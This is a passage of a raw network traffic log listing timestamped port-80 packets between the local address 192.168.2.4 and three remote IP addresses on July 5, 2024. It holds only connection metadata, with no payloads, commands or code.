                                                                Jul 5, 2024 04:23:07.328284979 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328296900 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328305960 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328313112 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328322887 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328332901 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328339100 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328350067 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328356028 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328366995 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328372002 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328385115 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328388929 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328399897 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328414917 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328416109 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328430891 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328430891 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328447104 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328461885 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328468084 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328478098 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328480005 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328500986 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328506947 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328517914 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328530073 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328542948 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328543901 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328558922 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328560114 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328576088 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328583956 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328593969 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328603029 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328609943 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328615904 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328627110 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328635931 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328643084 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328650951 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328666925 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328671932 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328681946 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328696966 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328710079 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328711987 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328736067 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328737020 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328751087 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328753948 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328773022 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328775883 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328788042 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328802109 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328803062 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328810930 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328818083 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328825951 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328834057 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328844070 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328850031 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328859091 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328866959 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328875065 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328881979 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328891039 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328897953 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328907967 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328912973 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328927040 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328932047 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328941107 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328947067 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328954935 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328973055 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.328985929 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328985929 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.328989029 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329005957 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329013109 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329020977 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329032898 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329035997 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329050064 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329051971 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329067945 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329072952 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329081059 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329094887 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329103947 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329112053 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329127073 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329138041 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329143047 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329159021 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329165936 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329176903 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329190016 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329193115 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329210997 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329217911 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329226971 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329241991 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329243898 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329262018 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329268932 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329277992 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329293013 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329293966 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329310894 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329318047 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329344988 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329351902 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329366922 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329368114 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329384089 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329395056 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329400063 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329407930 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329427958 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329447031 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329463005 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329472065 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329478025 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329489946 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329494953 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329510927 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329511881 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329519987 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329528093 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329544067 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329560041 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329560041 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329572916 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329576969 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.329602003 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.329626083 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.347439051 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347456932 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347471952 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347497940 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347512960 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347527981 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347552061 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347568035 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347584009 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347600937 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347620964 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.347651005 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347667933 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347682953 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347682953 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.347700119 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.347704887 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.347731113 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.347754955 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.373694897 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.373716116 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.373727083 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.373735905 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.373742104 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.373749018 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.373802900 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.373852968 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.373919964 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.373964071 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.373984098 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.373994112 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374033928 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374078035 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374089003 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374098063 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374108076 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374119997 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374125957 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374150038 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374169111 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374197006 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374207973 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374217033 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374227047 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374237061 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374239922 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374264002 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374299049 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374430895 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374439955 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374444962 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374456882 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374466896 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374476910 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374486923 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374511957 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374515057 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374522924 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374537945 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374547958 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374557018 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374557972 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374589920 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374610901 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374638081 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374649048 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374660969 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374674082 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374685049 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374697924 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374708891 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374713898 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374720097 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374732971 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374743938 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374747038 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374753952 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374764919 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374764919 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374773979 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374785900 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374787092 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374798059 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374808073 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374814034 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374819040 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374830008 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374842882 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374861956 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374876976 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374924898 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374936104 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374944925 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374955893 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374965906 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374975920 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.374975920 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374989033 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.374998093 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375008106 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375008106 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375020027 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375027895 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375030041 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375041962 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375052929 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375052929 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375066042 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375080109 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375087023 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375117064 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375193119 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375204086 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375212908 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375224113 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375236034 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375242949 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375246048 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375260115 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375269890 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375277042 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375281096 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375291109 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375313044 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375336885 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375349045 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375360012 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375368118 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375387907 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375395060 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375399113 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375408888 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375417948 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375420094 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375432968 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375442982 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375446081 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375484943 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375494957 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375518084 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375529051 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375538111 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375550032 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:07.375560999 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375585079 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:07.375601053 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:08.032622099 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:08.037482977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:08.037564993 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:08.037694931 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:08.042447090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:08.098242998 CEST4973080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:08.098501921 CEST4973380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:08.103360891 CEST804973377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:08.103373051 CEST804973077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:08.103440046 CEST4973080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:08.103441000 CEST4973380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:08.103585958 CEST4973380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:08.108453035 CEST804973377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:08.814224005 CEST804973377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:08.814281940 CEST4973380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:08.926539898 CEST4973380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:08.926863909 CEST4973480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:08.931611061 CEST804973477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:08.931669950 CEST804973377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:08.931688070 CEST4973480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:08.931723118 CEST4973380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:08.931871891 CEST4973480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:08.936577082 CEST804973477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:08.952868938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:08.952930927 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:08.954286098 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:08.959041119 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.136487961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.136502028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.136663914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:09.137711048 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:09.142440081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.331840038 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.331876993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.331887007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.331904888 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:09.331919909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:09.331934929 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:09.331962109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.331974983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.332000971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.332010984 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.332012892 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:09.332031965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:09.332045078 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:09.334145069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:09.338874102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.524148941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.524225950 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:09.544255018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:09.544307947 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:09.549206972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.549272060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.549280882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.549288988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:09.549300909 CEST804973285.28.47.30192.168.2.4
